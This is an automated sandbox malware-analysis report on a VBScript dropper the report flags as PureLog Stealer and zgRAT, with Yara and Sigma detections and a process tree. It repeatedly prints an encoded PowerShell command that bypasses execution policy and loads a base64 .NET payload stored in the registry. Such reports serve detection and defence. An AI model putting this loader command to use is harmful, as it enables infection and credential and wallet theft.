Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs

Overview

General Information

Sample name:nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs
renamed because original name is a hash value
Original sample name:nostanas dokuments rinam Nr.52-FK-24.vbs
Analysis ID:1533048
MD5:1f158aaa048de08d758d4ed4d65be651
SHA1:7f443dad2bd9e472e96161979f8f628b9c5232a2
SHA256:453f9f1860d49936a81140bc75488afdf01dfc5d4f23671c177a9310471b4b08
Tags:vbsuser-abuse_ch
Infos:

Detection

PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Encrypted powershell cmdline option found
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3552 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • CasPol.exe (PID: 1876 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe" MD5: C91C5994E9C0F1690C296B57DFCD2EDF)
      • CasPol.exe (PID: 4832 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe" MD5: C91C5994E9C0F1690C296B57DFCD2EDF)
      • CasPol.exe (PID: 6416 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe" MD5: C91C5994E9C0F1690C296B57DFCD2EDF)
      • CasPol.exe (PID: 6120 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe" MD5: C91C5994E9C0F1690C296B57DFCD2EDF)
      • CasPol.exe (PID: 5352 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe" MD5: C91C5994E9C0F1690C296B57DFCD2EDF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.3382819373.000001A9C3610000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    00000003.00000002.3382819373.000001A9C3610000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000003.00000002.3372776875.000001A9BB668000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        Process Memory Space: powershell.exe PID: 6500INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x121fdc:$b2: ::FromBase64String(
        • 0xcc58:$s1: -join
        • 0x12492:$s1: -join
        • 0x24b2e:$s1: -join
        • 0x2528e:$s1: -join
        • 0x121f93:$s1: -join
        • 0x147831:$s1: -join
        • 0x2dbebd:$s1: -join
        • 0x2e8f92:$s1: -join
        • 0x2ec364:$s1: -join
        • 0x2eca16:$s1: -join
        • 0x2ee507:$s1: -join
        • 0x2f070d:$s1: -join
        • 0x2f0f34:$s1: -join
        • 0x2f17a4:$s1: -join
        • 0x2f1edf:$s1: -join
        • 0x2f1f11:$s1: -join
        • 0x2f1f59:$s1: -join
        • 0x2f1f78:$s1: -join
        • 0x2f27c8:$s1: -join
        • 0x2f2944:$s1: -join
        SourceRuleDescriptionAuthorStrings
        3.2.powershell.exe.1a9bb7b19b8.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
          3.2.powershell.exe.1a9bb7b19b8.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            3.2.powershell.exe.1a9c3610000.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              3.2.powershell.exe.1a9c3610000.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                3.2.powershell.exe.1a9bb7b19b8.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  Click to see the 3 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3552, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, ProcessId: 6500, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3552, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, ProcessId: 6500, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3552, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, ProcessId: 6500, ProcessName: powershell.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs", CommandLine|base64offset|contains: v., Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs", ProcessId: 3552, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3552, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, ProcessId: 6500, ProcessName: powershell.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3552, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, ProcessId: 6500, ProcessName: powershell.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs", CommandLine|base64offset|contains: v., Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs", ProcessId: 3552, ProcessName: wscript.exe
